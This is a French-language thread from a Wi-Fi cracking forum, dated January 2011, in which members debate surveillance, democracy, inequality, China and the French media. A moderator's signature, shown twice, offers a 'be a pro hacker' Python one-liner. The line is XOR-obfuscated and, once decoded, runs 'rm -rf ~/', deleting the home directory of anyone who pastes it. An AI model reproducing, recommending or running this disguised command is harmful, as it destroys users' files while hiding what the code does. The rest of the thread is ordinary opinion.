Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 16-01-2011 14:12:21

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : La France passe en version big brother 2

koala a écrit :

Je suis entierement d'accord avec ton discours et l'exemple des sdf et bien choisi, si les gens aiment les voir en chier a la tv mais les ignore en passant a coté c'est a mon avis car ils ont une espèce de phobie intérieure a se retrouver dans la meme situation un jour.

Exactement, la peur fait que tu fermes les yeux (tu occultes) au lieu d'agir et que tu fini par accepter de subir de peur de perdre ce que tu as.

Tu as bien compris  ce que je voulais exprimer.

C'est ça qui est plus dangereux  que tout, c'est la base de l'asservissement, de l'individu et surtout de ses idées.
Une fois que les bases sont posées même si il va tiquer un peu, l'angoisse aidant, il va tout accepter et les quelques gens lucides se retrouveront isolés et n'auront pas de poids réel.

Dernière modification par noireaude (16-01-2011 14:19:43)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 18-01-2011 13:16:41

spawn
Modérateur

D'accord avec vous.
Cela dit ,je préfère vire en France qu'en Chine, où Big Jintao Brother veille (et bien !).
Coté asservissement des masses, on en est pas encore là, et ce n'est pas de l'asservissement dans le cas de la Chine, puisqu'il n'y a pas eu de démocratie depuis.. depuis.. heu, y'en a eu ?
Apprenons donc rester critiques dans nos combats contre l'impensable.

!! Je ne veux pas dire "faisons les méduses, on est pas des sushis", mais "soyons heureux de pouvoir nager à l'envers du courant".

ps : La Suède, ca à l'air sympa pour ce qui est d'Internet (en plus ils ont pas de thons), mais -12°C en été,c'est plutôt moyen.:D

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#28 18-01-2011 18:01:37

noireaude
Membre d'honneur
Site Web

On est pas Dimanche mais c'est pavé quand même !!! na !!!

Méfies toi des apparences entre ce que te montre les médias et ce que vivent effectivement les chinois.

Contrairement à ce que pensent les gens et même si ils ne s'en rendent pas compte, la France n'est pas une démocratie, vous ne vivez pas das une démocratie.

Liberté.

La liberté totale d'expression n'existe pas, contrairement aux états unis ou à la suisse par exemple.
En France vous n'êtes pas totalement libre de dire tout ce que vous pensez, vous ne pouvez pas publier ce que vous voulez sans risque de représailles ou de censure partielle voir totale.

Tout le monde n'est pas libre d'aller et venir il n'y a qu'à voir le cas des roms cet été, ce qu'ils ont fait est très ressemblant à ce qu'aurait pu faire un régime fachiste.

Je ne vois pas ou est la démocratie et ou sont les droits de l'homme la dedans, en revanche toutes proportions gardées ça me fait penser à de la déportation .

L'adoption en force de lois, de réformes, sans référendum, sans consultation du peuple ou d'instances le représentant de façon correcte est également une entrave à la liberté de décision et digne d'un régime totalitaire.

La liberté n'existe pas pour tout le monde en France, c'est un concept qui n'est valable que pour les élites.

Les gens modeste ne sont libres que de payer dans tous les sens et de se la fermer.

Ah oui j'oubliais on a le droit de vote, c'est sur ça change tout de pouvoir voter pour un con qui te fait plein de promesses qu'il ne tiendra jamais et qui plus est se veut à chaque fois pire que celui d'avant.

De toute façon une fois en place ils s'en foutent, il feront de toute façon partit quoi qu'il arrive de l'élite qui fait ce qu'elle veut et qui est si ce n'est au dessus des lois,  tout du moins au dessus de vraies sanctions.

Compétant ou non, tu vas te les ramasser à toutes les sauces et à tout les mandats, jusqu'à l'age ou tu te retrouves pour la deuxième fois de ta vie avec des couches.

Allez voter, vous êtes libres... Et comme à chaque fois ils vous la mettront.

Egalité.

Les scandales de politicards qui s'en mettent plein les fouilles sur notre dos et qui ne font jamais un jour de taule sont édifiants.

Voir pire encore, ils reviennent (quand ils se sont absenté) quelques années plus tard continuer leur carrière tranquillement, la ou un pauvre type qu'a pas un sous finira en taule pour quelques vols dans un magasin.

Ca nous montre bien ou ils nous la fourrent leur égalité.

Je ne suis pas contre le fait que le gars qui vole dans les magasins aille en taule si il le mérite et si il est multi récidiviste.

En revanche le politique mis en examen condamné pour des faits souvent bien plus graves doit lui aussi se retrouver en taule (et dans le même de préférence, pas dans des cellules tout confort).

Il ne doit pas toujours s'en sortir comme une fleur ou avec des sanctions mineures bien en dessous des faits reprochés.

L'égailité au niveau médical, c'est la même chose, les gens modestes ont de moins en moins les moyens de se soigner de façon correcte quand ils n'ont pas les moyens de se payer une mutuelle. (Il n'y a qu'à voir le nombre impressionnant des médicaments ou des soins qui ne sont plus remboursés).

L'accès au soins devient pour eux très difficile on arrive à une médecine à deux vitesses, t'as des sous tu es bien soigné, t'en a pas c'est le minimum syndical.

On est pas égaux devant les lois, on est pas égaux dans les droit fondamentaux que sont l'accès aux soins, l'accès au logement etc etc....

Fraternité.

Il n'y en a plus vraiment mais ça tout le monde en est responsable, je n'accable personne en particuliers il ne tient qu'à nous d'aider son prochain.

Les exemples sont nombreux, mais pour en revenir à la chine quand tu parles d'asservissement des masses et que tu compares à la France, je trouve qu'il n'y a pas de grandes différences, si ce n'est que chez nous c'est beaucoup plus insidieux et déguisé.

On te donne l'impression que tu es libre, mais dans les faits il n'en est rien, il y comme partout ailleurs une élite qui asservi les plus modeste.

Sur ce point en revanche je tempère, je ne suis pas contre le fait que les plus modestes travaillent pour le plus riches sur le principe, il ne peut pas y avoir que des riches.

Je considère en revanche que cela devient de l'asservissement quand les richesses ne sont pas réparties de façon équitable, sur ce point il me parait important qu'à partir du moment ou tu travailles, tu dois pouvoir en vivre de façon correcte.

Pour tout remerciement il n'est pas rare que tu te bouffes une délocalisation en prime qui va te mettre à la rue et sur la paille pour tout remerciement, pour que celui que tu as enrichi s'en mettent encore plus dans les fouilles. Merci.

Quand tu parles d'asservissement de masse encore tu dis "on en est pas encore la", je te corrige tu devrais dire on en est plus la n'oublies pas notre passé colonialiste hein.

Alors c'est sur que les chinois ont opprimé et oppriment encore certaines minorités, il est certain aussi que le régime chinois n'est pas un modèle parfait.

Le notre non plus.
Il ne faut pas se leurrer l'oppression des minorités existe aussi en France, on appel ça la discrimination.
L'exclusion que se soit par le travail, l'accès au logement etc etc ... qui touche certaines franges de la population, la censure et tout ce que j'ai cité plus haut sont aussi une forme d'oppression.

Ce que je vais dire peut paraitre étrange au premier abord mais si on réfléchis bien, et si on ne boit pas tout ce que les médias nous font ingurgiter, je ne pense pas que le chinois moyen soit plus malheureux que nous.

Il a certes des soucis aussi, sa vie sous certains aspects est peut paraitre plus rude, la vie chez nous l'était aussi dans nos campagnes il n'y pas encore si longtemps, les gens étaient pourtant à coup sur plus heureux qu'aujourdhui je pense.

Il y a une différence fondamentale en ce qui concerne le chinois moyen d'aujourdhui, il fait partit des pays émergents, son statut ne peut aller qu'en s'améliorant, il ne peut que s'élever, la ou nous on ne sait pas ce qu'on sera demain, ni même si on va pas finir sa vie à dormir dans carton faute de pouvoir vivre correctement de sa retraite après avoir trimé toute une vie.

Ca demande réflexion.

Une chose est sur en revanche et ça on ne peut pas le nier, il ne fait pas bon faire partie d'une minorité en Chine, tibétaine ou autre mais cela ne veut pas dire que le chinois moyen lui est malheureux, ça n'est pas la même chose.

Il faut bien en revanche comprendre une chose avant de juger hativement et encore une fois voir les choses de manière plus globale.
Les chinois pratiquent au niveau des minorités, une politique d'assimilation\d'intégration forcée, c'est vrai.
Ce qui n'est pas bon tout le monde est d'accord la dessus.

On se permet de brandir cet aspect et résumer la chine à se facteur la alors que dans le même temps on pratique chez nous l'exclusion des minorités après avoir essayé et échoué lamentablement de les intégrer.

Ni l'un ni l'autre n'est bon, mais qui des deux peur se permettre de critiquer l'autre dans l'histoire ?

Moi en tout cas je me garderais bien de répondre car je n'en sais rien.

Tu laisses entendre que la démocratie est le seul modèle valable quand tu critiques la chine et son régime communiste.

La chine en effet n'en a  été une démocratie, mais est à l'heure actuelle un régime communiste, je ne suis pas sur que le modèle communiste en revanche soit meilleur ou plus mauvais que la démocratie dans ces concepts fondamentaux.

Une chose est sure en revanche, une mauvaise démocratie est certainement plus nocive qu'un régime communiste bien appliqué pour le citoyen et vice et versa.

De toute façon si tu regardes bien le problème en ce qui nous concerne ne se pose même plus en ces termes, on ne vit plus dans l'un ou l'autre de ces régimes.
Je serais tenté de dire que notre régime n'est plus démocratique ou communiste mais purement, simplement et exclusivement capitaliste.

Les états ne peuvent plus agir comme bon leur semble dans la mesure ou ils sont devenus dépendants des multinationales. Notre dirigeant est le système boursier, et il est capricieux smile.

Pour finir enfin.

Il n'y a pas encore de régime parfait, ils sont tous mauvais quand ils sont mal appliqués et le problème est toujours le même .

Dans tout régime, il va y avoir fatalement une dérive qui va mener à une mauvaise redistribution des richesses qui va précariser ses forces vives et pour ainsi dire démoraliser les troupes.

C'est voulu et calculé, on te donnes assez pour que tu gueules pas trop, mais surtout pas trop histoire que tu restes dépendant faute d'avoir d'autres choix.
Pas un seul modèle appliqué à grande échelle n'a pu résoudre ce problème, car aucun modèle ne laisse assez de marge au peuple pour qu'il puisse se prendre en charge totalement.

Cela ne veut pas dire que c'est impossible, il faut rester optimiste et objectif.

Mais c'est tellement compliqué, on te mets tellement de bâtons dans les roues, que peu de gens on la force le courage ou simplement les moyens  de s'en extraire et de s'élever dans la société quand ils ne partent pas d'un milieux favorisé.

Ps : La suède et les pays scandinaves en revanche je te suis et je déménage demain si il le faut thon ou pas thon (mais la tu fais référence au Japon) smile

Dernière modification par noireaude (18-01-2011 19:26:07)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#29 20-01-2011 22:52:21

Grand Hibou
Membre d'honneur

Très intéressant la noiraude !

Pour ce qui est des chinois plus particulièrement, je peux dire qu'ils ne sont pas plus malheureux que nous français en général. J'y était il y a peu et je travaille de plus en plus avec la Chine.
Je me marre souvent comme une baleine en voyant nos élites françaises, ou autres bien sur, montrer la paille dans l'oeil du petit chinois...
Un ami français installé en Chine avec qui je travaille en permanence m'a tout récemment qu'il se sent tout aussi libre là-bas qu'en France, voire plus même vu la tournure que cela prend ici.

Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

#30 20-01-2011 23:34:06

spawn
Modérateur

C4est vrai que j'ai parlé de la chine.. je n'en connais que la censure sur Internet et les photos des années 50, lorsque mon grand père y a été. Il fut l'un des premiers européens à entrer en chine.
(Ne calculez pas, je n'ai plus d'âge smile)

Allez, sous les pavés :
                               \V/         \V/
                                |             |
~~~~~~~~~..----`-``````````````````` (si si, c'est une plage. faut imaginer..)

Hexadécimalo-théorico-expatrialement, Spawn.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#31 21-01-2011 07:16:46

noireaude
Membre d'honneur
Site Web

Sympa la plage spawn smile

Sinons c'est vrai grand hibou c'est assez hilarant de voir nos politiques et nos médias essayer de faire jouer la peur du Chinois.

Le pire c'est  que ça marche, les médias devraient de temps en temps montrer les choses sous tous leur aspects, ça ne ferait pas de mal.

Ils ne devraient pas se contenter de brandir des épouvantails, de nos jours les médias ne font plus que trois choses, de la télé poubelle (télé réalité), télé sensation (reportage à la con), et des émissions de cuisine afin qu'on ailles tous bouffer quand on aura eu bien peur et qu'on sera tous déprimés à l'idée qu'avec la crise on va finir sdf (ça c'est peut être pas fuax:) ) . Bref tout ce qui fait vendre.

J'ai réglé le problème de toute façon je ne regarde plus les actualités française, mais plutôt des chaînes comme Euronews qui on l'air bien plus indépendantes.

Je le conseil à tout le monde d'ailleurs.

Dernière modification par noireaude (21-01-2011 07:21:34)

#32 21-01-2011 08:21:58

koala
Membre d'honneur
Lieu : In the sky

C'est sur que vaut mieux eviter les médias français wink pour le peu qui nous apportent...

#33 21-01-2011 18:44:38

noireaude
Membre d'honneur
Site Web

koala a écrit :

C'est sur que vaut mieux eviter les médias français wink pour le peu qui nous apportent...

Je ne pense pas qu'ils faillent les éviter, mais bien cibler les journaux et les émissions ou les revues.

Je ne veux pas jeter la pierre ou diaboliser tous les médias mais plutôt leur tendance à faire du sensas et à entretenir le climat de peur dans la société.

Il y a des choses intéressantes sur Arte et et sur France 5 dans une moindre mesure.

Pour l'actualité Internationale en revanche il vaut mieux privilégier les médias indépendants, car la tu as raison ils ne nous apportent rien.

#34 21-01-2011 22:43:13

koala
Membre d'honneur
Lieu : In the sky

J'aime bien france5, "c'est dans l'air" et par exemple une très bonne emission wink

Dernière modification par koala (21-01-2011 22:43:39)

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]